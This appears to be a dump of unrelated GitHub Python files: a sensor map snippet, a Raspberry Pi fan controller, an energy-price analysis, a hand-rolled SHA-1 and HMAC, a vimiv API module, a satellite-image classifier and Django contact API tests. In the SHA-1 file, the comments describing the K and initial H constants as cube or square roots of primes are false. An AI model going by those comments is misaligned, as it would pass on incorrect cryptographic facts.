dfSensors.iterrows():\r\n location = sensor['latitude'], sensor['longitude']\r\n folium.Marker(\r\n location=location,\r\n popup=Popup(\"Sensor Data\", parse_html=False),\r\n tooltip=f\"Sensor at {location}\",\r\n ).add_to(map)\r\n \r\n st.header(\"Live read Sensor data\")\r\n out = st_folium(map, width=1000) # Capture the output into 'out'\r\n st.write(\"Popup:\", out[\"last_object_clicked_popup\"])\r\n st.write(\"Tooltip:\", out[\"last_object_clicked_tooltip\"])","repo_name":"flowgeniusmz/FEOC-Sequestration","sub_path":"pages/3_Analytics_Panel.py","file_name":"3_Analytics_Panel.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10447504676","text":"#!/usr/bin/env python3\n# Author: Andreas Spiess\nimport os\nimport time\nfrom time import sleep\nimport signal\nimport sys\nimport RPi.GPIO as GPIO\n\n\nfanPin = 17 # The pin ID, edit here to change it\nbatterySensPin = 18\n\nmaxTMP = 50 # The maximum temperature in Celsius after which we trigger the fan\n\ndef Shutdown(): \n fanOFF()\n os.system(\"sudo shutdown -h 1\")\n sleep(100)\ndef setup():\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(fanPin, GPIO.OUT)\n GPIO.setup(batterySensPin, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n #GPIO.add_event_detect(batterySensPin, GPIO.RISING, callback = Shutdown, bouncetime = 2000)\n GPIO.setwarnings(False)\n fanOFF()\n return()\ndef getCPUtemperature():\n res = os.popen('vcgencmd measure_temp').readline()\n temp =(res.replace(\"temp=\",\"\").replace(\"'C\\n\",\"\"))\n #print(\"temp is {0}\".format(temp)) #Uncomment here for testing\n return temp\ndef fanON():\n setPin(True)\n return()\ndef fanOFF():\n setPin(False)\n return()\ndef handleFan():\n CPU_temp = float(getCPUtemperature())\n if CPU_temp>maxTMP:\n fanON()\n #print(\"fan on\")\n if CPU_temp 4]\n#Aggregate, get the mean of the Aberdeen data for all prices.\n##WeekdY\nMeanWkData=WkData[['Month','Hour','LMP','RegUP','RegDN','Spin','Supp']].groupby(['Month','Hour']).mean()\nMeanWkData.head(12)\n##Weekend\nMeanWkendData=WkendData[['Month','Hour','LMP','RegUP','RegDN','Spin','Supp']].groupby(['Month','Hour']).mean()\nMeanWkendData.head(12)\n\n#Create subsets of data for every month\n#Weekday by month\njanmeanwkda=MeanWkData.loc[1:1]\nfebmeanwkda=MeanWkData.loc[2:2]\nmarmeanwkda=MeanWkData.loc[3:3]\naprmeanwkda=MeanWkData.loc[4:4]\nmaymeanwkda=MeanWkData.loc[5:5]\njunmeanwkda=MeanWkData.loc[6:6]\njulmeanwkda=MeanWkData.loc[7:7]\naugmeanwkda=MeanWkData.loc[8:8]\nsepmeanwkda=MeanWkData.loc[9:9]\noctmeanwkda=MeanWkData.loc[10:10]\nnovmeanwkda=MeanWkData.loc[11:11]\ndecmeanwkda=MeanWkData.loc[12:12]\n#Weekend by month\njanmeanwkndda=MeanWkendData.loc[1:1]\nfebmeanwkndda=MeanWkendData.loc[2:2]\nmarmeanwkndda=MeanWkendData.loc[3:3]\naprmeanwkndda=MeanWkendData.loc[4:4]\nmaymeanwkndda=MeanWkendData.loc[5:5]\njunmeanwkndda=MeanWkendData.loc[6:6]\njulmeanwkndda=MeanWkendData.loc[7:7]\naugmeanwkndda=MeanWkendData.loc[8:8]\nsepmeanwkndda=MeanWkendData.loc[9:9]\noctmeanwkndda=MeanWkendData.loc[10:10]\nnovmeanwkndda=MeanWkendData.loc[11:11]\ndecmeanwkndda=MeanWkendData.loc[12:12]\n#Export to csv\n##Weekday\njanmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/janmeanwkda.csv')\nfebmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/febmeanwkda.csv')\nmarmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/marmeanwkda.csv')\naprmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/aprmeanwkda.csv')\nmaymeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/maymeanwkda.csv')\njunmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/junmeanwkda.csv')\njulmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/julmeanwkda.csv')\naugmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/augmeanwkda.csv')\nsepmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/sepmeanwkda.csv')\noctmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/octmeanwkda.csv')\nnovmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/novmeanwkda.csv')\ndecmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/decmeanwkda.csv')\n##weekend\njanmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/janmeanwkndda.csv')\nfebmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/febmeanwkndda.csv')\nmarmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/marmeanwkndda.csv')\naprmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/aprmeanwkndda.csv')\nmaymeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/maymeanwkndda.csv')\njunmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/junmeanwkndda.csv')\njulmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/julmeanwkndda.csv')\naugmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/augmeanwkndda.csv')\nsepmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/sepmeanwkndda.csv')\noctmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/octmeanwkndda.csv')\nnovmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/novmeanwkndda.csv')\ndecmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/decmeanwkndda.csv')\n\n#**** Here the RT LMP data is brought in to create the probabilities for spikes***#\n#Read in data\nFullDataRT=pd.read_csv('/Users/Work/Desktop/NWE/Raw_Data/RT_NWE_FULL.csv')\nFullDataRT.info()\nFullDataRT.head()\n#Get month and hour columns\nFullDataRT['textdate']=FullDataRT['Interval'].astype(str)\nFullDataRT['textdate']=FullDataRT['textdate'].str.strip()\nFullDataRT['Date']=pd.to_datetime(FullDataRT['textdate'], format='%d%b%y:%H:%M', errors='coerce')\nFullDataRT['Hour']= FullDataRT.Date.apply(lambda x : x.hour)\nFullDataRT['Month']= FullDataRT.Date.apply(lambda x : x.month)\nFullDataRT['Day']= FullDataRT.Date.apply(lambda x : x.day)\nFullDataRT['Weekday'] = FullDataRT['Date'].apply(lambda x: x.weekday())\n#Weekday data\nWkDataRT=FullDataRT[FullDataRT.Weekday < 5]\n#WeekEnd\nWkendDataRT=FullDataRT[FullDataRT.Weekday > 4]\n#Aggregate, get the mean of the Aberdeen data for all prices.\n##WeekdY\nMeanWkDataRT=WkDataRT[['Month','Hour','LMP','RegUP','RegDN','Spin','Supp']].groupby(['Month','Hour']).mean()\nMeanWkDataRT.head(12)\n##Weekend\nMeanWkendDataRT=WkendDataRT[['Month','Hour','LMP','RegUP','RegDN','Spin','Supp']].groupby(['Month','Hour']).mean()\nMeanWkendDataRT.head(12)\n#***********************************************************#\n\n#Spike frequency\n##Weekday\nWksubRT=WkDataRT[['Month','Hour','LMP']]\nWksubRT['SpikeFlag']=0\nWksubRT.ix[WksubRT.LMP>100,'SpikeFlag']=1\nWkSpikesRT=WksubRT[['SpikeFlag','Month','Hour']].groupby(['Month','Hour']).sum()\n##Weekday\nWkendsubRT=WkendDataRT[['Month','Hour','LMP']]\nWkendsubRT['SpikeFlag']=0\nWkendsubRT.ix[WkendsubRT.LMP>100,'SpikeFlag']=1\nWkendSpikesRT=WkendsubRT[['SpikeFlag','Month','Hour']].groupby(['Month','Hour']).sum()\n\nWkSpikesRT.to_csv('/Users/Work/Desktop/NWE/Output/WkSpikes.csv')\nWkendSpikesRT.to_csv('/Users/Work/Desktop/NWE/Output/WkendSpikes.csv')\n\n#Spike mean by day month (probabilty)\n##Weekday\nWkSpikesmeanRT=WksubRT[['SpikeFlag','Month','Hour']].groupby(['Month','Hour']).mean()\n#Weekend\nWkendSpikesmeanRT=WkendsubRT[['SpikeFlag','Month','Hour']].groupby(['Month','Hour']).mean()\n\nWkSpikesmeanRT.to_csv('/Users/Work/Desktop/NWE/Output/WkSpikesmean.csv')\nWkendSpikesmeanRT.to_csv('/Users/Work/Desktop/NWE/Output/WkendSpikesmean.csv')\n#Average Spike Price\nWkSpikePriceRT=WksubRT.where(WksubRT.SpikeFlag==1).groupby(['Month','Hour']).mean()\nWkendSpikePriceRT=WkendsubRT.where(WkendsubRT.SpikeFlag==1).groupby(['Month','Hour']).mean()\n\nWkSpikePriceRT.to_csv('/Users/Work/Desktop/NWE/Output/WkSpikeprice.csv')\nWkendSpikePriceRT.to_csv('/Users/Work/Desktop/NWE/Output/WkendSpikeprice.csv')\n\n\n#************After this point we have data set with average DA Prices and RT Spike expected Prices*******\nMeanWkData['ExpectedSpikeWk']=WkSpikesmeanRT.SpikeFlag*WkSpikePriceRT.LMP\nMeanWkendData['ExpectedSpikeWkend']=WkendSpikesmeanRT.SpikeFlag*WkendSpikePriceRT.LMP\n\n#**************** returns data set that specifies what to sell*******\n\n#Set Generation Characteristics Parameters\nFullGenHR=8.9 #Mbtu/MW\nMidGenHR=9.5 #Mbtu/MW\nMinGenHR=10.5 #Mbtu/MW\nFullGenCap=18.4 #MW\nMidGenCap=11.20 #MW\nMinGenCap=4.0 #MW\nVariableOM=7.0 #$/MWh\nOutage=.05 # will be %\nStrikePriceFull=33.70 #$/MWh\nStrikePriceMid=33.50 #$/MWh\nGasPrice=3 #$\nPowerOn= 28 #$\nPowerOff= 18 #$\n\n#Weekday Gros Margin Columns\nMeanWkData['GMregulation']= MeanWkData.RegUP*(FullGenHR-MinGenHR)+MidGenCap*(PowerOn-PowerOff)/2-(StrikePriceMid-MidGenCap)\nMeanWkData['GMSpin']=(FullGenCap-MinGenCap)*MeanWkData.Spin-(MinGenCap*(MinGenHR*GasPrice-VariableOM))\nMeanWkData['GMnonSpin']=FullGenCap*MeanWkData.Supp\n\n#Weekend Gross Margin Columns \nMeanWkendData['GMregulation']= MeanWkendData.RegUP*(FullGenHR-MinGenHR)+MidGenCap*(PowerOn-PowerOff)/2-(StrikePriceMid-MidGenCap)\nMeanWkendData['GMSpin']=(FullGenCap-MinGenCap)*MeanWkendData.Spin-(MinGenCap*(MinGenHR*GasPrice-VariableOM))\nMeanWkendData['GMnonSpin']=FullGenCap*MeanWkendData.Supp\n\n#Subset to Only GM prices and spike then select max column name \nGMWkData=MeanWkData[['GMregulation','GMSpin','GMnonSpin','ExpectedSpikeWk']]\nGMWkendData=MeanWkendData[['GMregulation','GMSpin','GMnonSpin','ExpectedSpikeWkend']]\n\nGMWkData['ExpectedSpikeWk']=GMWkData['ExpectedSpikeWk'].fillna(value=0)\nGMWkendData['ExpectedSpikeWkend']=GMWkendData['ExpectedSpikeWkend'].fillna(value=0)\n\nGMWkData['ScaledSpike']=GMWkData['ExpectedSpikeWk']*12\nGMWkendData['ScaledSpike']=GMWkendData['ExpectedSpikeWkend']*12\n\nGMWkData['Rule']=GMWkData.idxmax(axis=1)\nGMWkendData['Rule']=GMWkendData.idxmax(axis=1)\n#Create final CSV\nGMWkData.to_csv('/Users/Work/Desktop/NWE/Output/WeekRules.csv')\nGMWkendData.to_csv('/Users/Work/Desktop/NWE/Output/WeekendRules.csv')","repo_name":"skadaman/Analytics","sub_path":"NWEmodelrules.py","file_name":"NWEmodelrules.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12731188237","text":"from util import joinBytes, splitBits\nfrom typing import List\n\n\nBIT_MASK: int = (1 << 32) - 1\n\n\n# The first 32 bits of the fractional parts of the cube roots of the first 4 primes.\nK: List[int] = [0x5a827999, 0x6ed9eba1, 0x8f1bbcdc, 0xca62c1d6]\n\n\ndef shaPad(message: List[int], byteSize: int) -> List[int]:\n bitSize: int = byteSize * 8\n outLength: int = (len(message) // bitSize + 1) * bitSize\n out: List[int] = [0] * outLength\n\n # Copy first 'n' values of 'message' to 'out'.\n i: int = 0\n while i < len(message):\n out[i] = message[i]\n i += 1\n\n # Append a single bit to the end of 'out'.\n out[i] = 0x80\n\n byteMask: int = (1 << 8) - 1\n inLength: int = len(message) * 8\n\n # Append a 'message' length to the end of 'out' in bits.\n i: int = len(out)\n while inLength:\n i -= 1\n out[i] = inLength & byteMask\n inLength >>= 8\n\n return out\n\n\ndef rotateRight(x: int, y: int) -> int:\n c0: int = x >> y\n c1: int = x << 32 - y\n return (c0 | c1) & BIT_MASK\n\n\ndef ch(x: int, y: int, z: int) -> int:\n c0: int = x & y\n c1: int = x ^ BIT_MASK\n c2: int = c1 & z\n return c0 ^ c2\n\n\ndef maj(x: int, y: int, z: int) -> int:\n c0: int = x & y\n c1: int = x & z\n c2: int = y & z\n return c0 ^ c1 ^ c2\n\n\ndef ft(s: int, x: int, y: int, z: int) -> int:\n if s == 0: return ch(x, y, z)\n if s == 1 or s == 3: return x ^ y ^ z\n if s == 2: return maj(x, y, z) \n\n\ndef gamma(w: int, x: int, y: int, z: int) -> int:\n c0: int = rotateRight(w, x)\n c1: int = rotateRight(w, y)\n c2: int = w >> z\n return c0 ^ c1 ^ c2\n\n\ndef sigma(w: int, x: int, y: int, z: int) -> int:\n c0: int = rotateRight(w, x)\n c1: int = rotateRight(w, y)\n c2: int = rotateRight(w, z)\n return c0 ^ c1 ^ c2\n\n\ndef update(out: List[int], msg: List[int], start: int) -> None:\n W: List[int] = [0] * 80\n\n for i in range(16):\n W[i] = msg[start + i]\n\n for i in range(16, 80):\n c: int = W[i - 3] ^ W[i - 8] ^ W[i - 14] ^ W[i - 16]\n W[i] = rotateRight(c, 31)\n\n H: List[int] = [out[0], out[1], out[2], out[3], out[4]]\n\n for i in range(len(W)):\n s: int = i // 20\n t: int = (rotateRight(H[0], 27) + ft(s, H[1], H[2], H[3]) + H[4] + W[i] + K[s]) & BIT_MASK\n H[4] = H[3]\n H[3] = H[2]\n H[2] = rotateRight(H[1], 2)\n H[1] = H[0]\n H[0] = t\n\n for i in range(len(H)):\n out[i] = (out[i] + H[i]) & BIT_MASK\n\n\ndef sha1(message: List[int]) -> List[int]:\n # The first 32 bits of the fractional parts of the square roots of the first 5 primes.\n H: List[int] = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, 0xc3d2e1f0]\n\n padding: List[int] = shaPad(message, 8) # Ensure 'message' length is evenly divisible by 64.\n payload: List[int] = joinBytes(padding, 4) # Convert byte array to 32-bit array.\n\n # Use each 32 bit interval of 'message' to update 'H'.\n for i in range(0, len(payload), 16):\n update(H, payload, i)\n\n # Convert 32-bit array to byte array.\n return splitBits(H, 4)\n\n\ndef hmac1(key: List[int], message: List[int]) -> List[int]:\n if len(key) > 64:\n key = sha1(key)\n\n # Ensure 'key' length is evenly divisible by 64.\n padded: List[int] = [0] * 64\n for i in range(len(key)):\n padded[i] = key[i]\n\n # Xor each bit value of 'padded' and 0x36.\n for i in range(len(padded)):\n padded[i] ^= 0x36\n inner = padded + message\n\n # Xor each bit value of 'padded' and 0x6a.\n for i in range(len(padded)):\n padded[i] ^= 0x6a\n outer = padded + sha1(inner)\n\n return sha1(outer)\n\n\nif __name__ == '__main__':\n seed: List[int] = [\n 17, 30, 0, 32, 247, 20, 162, 6,\n 47, 0, 31, 160, 16, 252, 180, 179,\n 136, 24, 172, 113, 103, 72, 59, 104,\n 135, 229, 132, 209, 107, 129, 161, 171\n ]\n\n message: List[int] = [\n 116, 61, 190, 93, 174, 15, 154, 165,\n 22, 242, 56, 13, 168, 8, 194, 94,\n 110, 224, 129, 237, 180, 216, 85, 221,\n 167, 203, 32, 104, 169, 181, 142, 159\n ]\n\n \"\"\"\n [\n 80, 157, 238, 228, 93, 168, 13, 36, 154, 30,\n 202, 232, 182, 73, 69, 143, 109, 73, 59, 153\n ]\n \"\"\"\n hashed: List[int] = sha1(seed)\n print(hashed)\n\n \"\"\"\n [\n 226, 250, 216, 40, 236, 216, 81, 102, 19, 54,\n 185, 126, 89, 122, 19, 60, 196, 149, 62, 22\n ]\n \"\"\"\n hmac: List[int] = hmac1(seed, message)\n print(hmac)","repo_name":"BinaryBand/crypto-pi","sub_path":"sha1.py","file_name":"sha1.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13750111888","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\n\"\"\"`Utilities to interact with the application`.\"\"\"\n\nimport os\nfrom typing import List, Iterable, Callable, BinaryIO\nfrom vimiv.qt.gui import QPixmap\n\nfrom vimiv.utils import files, imagereader, imageheader\n\nfrom vimiv.api import (\n commands,\n completion,\n keybindings,\n modes,\n objreg,\n prompt,\n settings,\n signals,\n status,\n working_directory,\n _mark,\n _modules,\n)\n\nmark = _mark.Mark()\n\n\ndef current_path(mode: modes.Mode = None) -> str:\n \"\"\"Get the currently selected path.\n\n Args:\n mode: Force getting the currently selected path of a specific mode.\n Returns:\n The currently selected path as abspath.\n \"\"\"\n mode = mode if mode else modes.current()\n return mode.current_path\n\n\ndef pathlist(mode: modes.Mode = None) -> List[str]:\n \"\"\"Get the list of all currently open paths.\n\n Args:\n mode: Force getting the pathlist of a specific mode.\n Returns:\n The list of currently open paths.\n \"\"\"\n mode = mode if mode else modes.current()\n return list(mode.pathlist) # Ensure we create a copy\n\n\n@keybindings.register(\"o\", \"command --text='open '\")\n@commands.register(name=\"open\")\ndef open_paths(paths: Iterable[str]) -> None:\n \"\"\"Open one or more paths.\n\n **syntax:** ``:open path [path ...]``\n\n If any path given is an image, all valid images are opened in image mode. Otherwise\n the first valid directory is opened. If both fails, an error is displayed.\n\n .. hint:: Passing a single directory therefore changes the directory in the library,\n think ``cd``.\n\n positional arguments:\n * ``paths``: The path(s) to open.\n \"\"\"\n images, directories = files.supported(paths)\n if images:\n working_directory.handler.chdir(os.path.dirname(images[0]))\n signals.load_images.emit(images)\n modes.IMAGE.enter()\n elif directories:\n working_directory.handler.chdir(directories[0])\n modes.LIBRARY.enter()\n else:\n raise commands.CommandError(\"No valid paths\")\n\n\ndef add_external_format(\n file_format: str,\n test_func: imageheader.CheckFuncT,\n load_func: Callable[[str], QPixmap],\n) -> None:\n \"\"\"Add support for new fileformat.\n\n Args:\n file_format: String value of the file type\n test_func: Function returning True if load_func supports this type.\n load_func: Function to load a QPixmap from the passed path.\n \"\"\"\n # Prioritize external formats over all default formats, to ensure that on signature\n # collision, the explicitly registered handler is used.\n imageheader.register(file_format, test_func, priority=True)\n imagereader.external_handler[file_format] = load_func\n","repo_name":"karlch/vimiv-qt","sub_path":"vimiv/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"77"} +{"seq_id":"38059249081","text":"import argparse\nimport os\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nimport numpy as np\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tqdm import tqdm\n\nfrom scripts.get_s2_data_ee import get_history, get_pixel_vectors\n\ndef normalize(x):\n return (np.array(x) - 0) / (3000 - 0)\n\ndef stretch_histogram(array, min_val=0.1, max_val=0.75, gamma=1.2):\n clipped = np.clip(array, min_val, max_val)\n stretched = (clipped - min_val) / (max_val - min_val) ** gamma\n return stretched\n\ndef make_predictions(model_path, data, site_name, threshold):\n test_image = data\n model = keras.models.load_model(model_path)\n\n rgb_stack = []\n preds_stack = []\n threshold_stack = []\n print(\"Making Predictions\")\n for month in tqdm(list(test_image.keys())):\n test_pixel_vectors, width, height = get_pixel_vectors(test_image, month)\n if width > 0:\n test_pixel_vectors = normalize(test_pixel_vectors)\n\n r = np.reshape(np.array(test_pixel_vectors)[:,3], (width, height))\n g = np.reshape(np.array(test_pixel_vectors)[:,2], (width, height))\n b = np.reshape(np.array(test_pixel_vectors)[:,1], (width, height))\n rgb = np.moveaxis(np.stack((r,g,b)), 0, -1)\n rgb_stack.append(rgb)\n\n preds = model.predict(np.expand_dims(test_pixel_vectors, axis=-1))\n preds_img = np.reshape(preds, (width, height, 2))[:,:,1]\n preds_stack.append(preds_img)\n\n thresh_img = preds_img >= threshold\n threshold_stack.append(thresh_img)\n\n output_dir = '../figures/neural_network'\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n\n rgb_median = np.median(rgb_stack, axis=0)\n preds_median = np.mean(preds_stack, axis=0)\n threshold_median = np.median(threshold_stack, axis=0)\n\n plt.figure(dpi=150, figsize=(15,5))\n\n plt.subplot(1,3,1)\n plt.imshow(stretch_histogram(rgb_median))\n plt.title(f'{site_name} Median', size=8)\n plt.axis('off')\n\n plt.subplot(1,3,2)\n plt.imshow(preds_median, vmin=0, vmax=1, cmap='RdBu_r')\n plt.title('Classification Mean', size=8)\n plt.axis('off')\n\n plt.subplot(1,3,3)\n plt.imshow(threshold_median, vmin=0, vmax=1, cmap='gray')\n plt.title(f\"Positive Pixels Median: Threshold {threshold}\", size=8)\n plt.axis('off')\n\n title = f\"{site_name} - Median Values - Neural Network Classification - Threshold {threshold}\"\n plt.suptitle(title, y=1.01)\n plt.tight_layout()\n plt.savefig(os.path.join(output_dir, title + '.png'), bbox_inches='tight')\n plt.close()\n\n\n fig, ax = plt.subplots(dpi=200, facecolor=(1,1,1), figsize=(4,4))\n ax.set_axis_off()\n clipped_img = np.moveaxis([channel * (preds_median >= 0) for channel in np.moveaxis(rgb_median, -1, 0)], 0, -1)\n img = plt.imshow(np.clip(stretch_histogram(clipped_img), 0, 1))\n ax.set_title('Threshold 0.00', size=10)\n plt.tight_layout()\n\n def animate(i):\n i /= 100\n clipped_img = np.moveaxis([channel * (preds_median >= i) for channel in np.moveaxis(rgb_median, -1, 0)], 0, -1)\n img.set_data(np.clip(stretch_histogram(clipped_img), 0, 1))\n #img.set_data((preds_stack > i) * 1)\n ax.set_title(f\"{site_name} Threshold {i:.2f}\", size=10)\n return img,\n\n ani = animation.FuncAnimation(fig, animate, frames=100, interval=60, blit=True, repeat_delay=500)\n ani.save(os.path.join(output_dir, site_name + '_threshold_visualization' + '.mp4'))\n plt.close()\n\n return rgb_median, preds_median, threshold_median\n\ndef main():\n parser = argparse.ArgumentParser(description='Configure patch prediction')\n parser.add_argument('--coords', nargs='+', required=True, type=float, help='Lat Lon of patch center')\n parser.add_argument('--width', type=float, required=False, default=0.002, help='Width of patch in degrees. Max 0.03')\n parser.add_argument('--network', type=str, required=True, help='Path to neural network')\n parser.add_argument('--threshold', type=float, required=False, default=0.95, help='Classifier masking threshold')\n parser.add_argument('--num_months', type=int, required=False, default=22, help='Number of months to use for predictions')\n parser.add_argument('--start_date', type=str, required=False, default='2019-01-01', help='Start date for predictions')\n args = parser.parse_args()\n if args.width and args.width > 0.03:\n parser.error(\"Maximum patch width is 0.03\")\n\n coords = args.coords\n print(coords)\n lat = coords[0]\n lon = coords[1]\n width = args.width\n model_path = args.network\n threshold = args.threshold\n num_months = args.num_months\n start_date = args.start_date\n\n name = f\"{lat:.2f}, {lon:.2f}, {width} patch\"\n\n patch_history = get_history([[lon, lat]], [name], width, num_months=num_months, start_date=start_date)\n rgb_median, preds_median, threshold_median = make_predictions(model_path, patch_history, name, threshold)\n\nif __name__ == '__main__':\n main()\n","repo_name":"earthrise-media/plastics","sub_path":"scripts/nn_predict_gee.py","file_name":"nn_predict_gee.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"23916789399","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import status\nfrom rest_framework.test import APIClient, APITestCase\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\nfrom contact.models import Contact\n\nUser = get_user_model()\n\n\nclass TestContact(APITestCase):\n \"\"\" Test contact api. \"\"\"\n\n contact_url = '/api/v1/contacts/'\n\n @classmethod\n def setUpClass(cls):\n super(TestContact, cls).setUpClass()\n cls.first_user = User.objects.create_user(\n username='first_user',\n )\n cls.second_user = User.objects.create_user(\n username='second_user',\n )\n cls.first_user_contact = Contact.objects.create(\n owner=cls.first_user,\n first_name='Иван',\n last_name='Иванов',\n phone='+79046738754',\n email='ivanov@ivan.ru',\n )\n cls.second_user_contact = Contact.objects.create(\n owner=cls.second_user,\n first_name='Петр',\n last_name='Петров',\n phone='+79104563499',\n email='petrov@petr.ru',\n )\n\n def setUp(self) -> None:\n self.guest_client = APIClient()\n\n self.first_authorized_client = APIClient()\n first_token = RefreshToken.for_user(self.first_user)\n self.first_authorized_client.credentials(\n HTTP_AUTHORIZATION=f'Bearer {str(first_token.access_token)}'\n )\n\n self.second_authorized_client = APIClient()\n second_token = RefreshToken.for_user(self.second_user)\n self.second_authorized_client.credentials(\n HTTP_AUTHORIZATION=f'Bearer {str(second_token.access_token)}'\n )\n\n def test_get_contact_by_guest(self):\n response = self.guest_client.get(self.contact_url)\n expected_error = {'detail': 'Authentication credentials were not provided.'}\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n self.assertEqual(response.json(), expected_error)\n\n def test_get_contact_list_by_owner(self):\n contacts_count = Contact.objects.filter(owner=self.first_user).count()\n response = self.first_authorized_client.get(self.contact_url)\n expected_keys = ['count', 'next', 'previous', 'results']\n\n response_json = response.json()\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(list(response_json.keys()), expected_keys)\n self.assertEqual(response_json['count'], contacts_count)\n\n for contact in response_json['results']:\n self.assertTrue(Contact.objects.filter(\n owner=self.first_user,\n first_name=contact['first_name'],\n last_name=contact['last_name'],\n phone=contact['phone'],\n email=contact['email'],\n ).exists())\n\n def test_get_contact_with_id_by_owner(self):\n response = self.first_authorized_client.get(\n self.contact_url + str(self.first_user_contact.id) + '/'\n )\n\n response_json = response.json()\n contact = Contact.objects.filter(\n id=response_json['id'],\n first_name=response_json['first_name'],\n last_name=response_json['last_name'],\n phone=response_json['phone'],\n email=response_json['email'],\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n self.assertTrue(contact.exists())\n self.assertEqual(contact.first().owner, self.first_user)\n\n def test_get_contact_with_id_by_another_user(self):\n response = self.second_authorized_client.get(\n self.contact_url + str(self.first_user_contact.id) + '/'\n )\n expected_error = {'detail': 'Not found.'}\n\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n self.assertEqual(response.json(), expected_error)\n\n def test_create_contact_by_guest(self):\n data = {\n 'first_name': 'Guest',\n 'last_name': 'Guestovich',\n 'phone': '89003337777',\n 'email': 'guest@guestovich.ru',\n }\n response = self.guest_client.post(self.contact_url, data=data)\n expected_error = {'detail': 'Authentication credentials were not provided.'}\n\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n self.assertEqual(response.json(), expected_error)\n\n def test_create_contact_with_bad_data(self):\n data = {}\n response = self.first_authorized_client.post(self.contact_url, data=data)\n expected_error = ['This field is required.']\n response_json = response.json()\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n for error in response_json:\n self.assertEqual(\n response_json[error],\n expected_error\n )\n\n def test_validate_phone(self):\n invalid_phones = [\n '89oo3337777',\n 'phone',\n '111',\n '+790364548973134',\n '9036454897'\n ]\n data = {\n 'first_name': 'Phone',\n 'last_name': 'Phonovich',\n 'email': 'phone@phonovich.ru',\n }\n expected_error = {'phone': ['Invalid phone number format.']}\n for phone in invalid_phones:\n data['phone'] = phone\n response = self.first_authorized_client.post(self.contact_url, data=data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, phone)\n self.assertEqual(response.json(), expected_error)\n\n def test_create_contact(self):\n contacts_count = Contact.objects.count()\n data = {\n 'first_name': 'First',\n 'last_name': 'User',\n 'phone': '89003337777',\n 'email': 'first@user.ru',\n }\n response = self.first_authorized_client.post(self.contact_url, data=data)\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Contact.objects.count(), contacts_count + 1)\n\n def test_put_patch_delete_contact_by_another_user(self):\n url = self.contact_url + str(self.second_user_contact.id) + '/'\n methods = ['put', 'patch', 'delete']\n for method in methods:\n met = getattr(self.first_authorized_client, method)\n response = met(url)\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_put_patch_contact_by_owner(self):\n url = self.contact_url + str(self.first_user_contact.id) + '/'\n data = {\n 'first_name': 'Another first name',\n 'last_name': 'Another last name',\n 'phone': '89023567834',\n 'email': 'new@new.ru',\n }\n\n response = self.first_authorized_client.put(url, data=data)\n response_json = response.json()\n contact = Contact.objects.get(id=self.first_user_contact.id)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEquals(\n [\n contact.id,\n contact.first_name,\n contact.last_name,\n contact.phone,\n contact.email,\n ],\n [\n response_json['id'],\n response_json['first_name'],\n response_json['last_name'],\n response_json['phone'],\n response_json['email'],\n ]\n )\n\n def test_patch_contact_by_owner(self):\n url = self.contact_url + str(self.first_user_contact.id) + '/'\n data = {'phone': '89058754387'}\n\n response = self.first_authorized_client.patch(url, data=data)\n response_json = response.json()\n contact = Contact.objects.get(id=self.first_user_contact.id)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n contact.phone,\n response_json['phone']\n )\n\n def test_delete_contact_by_owner(self):\n url = self.contact_url + str(self.first_user_contact.id) + '/'\n\n response = self.first_authorized_client.delete(url)\n\n 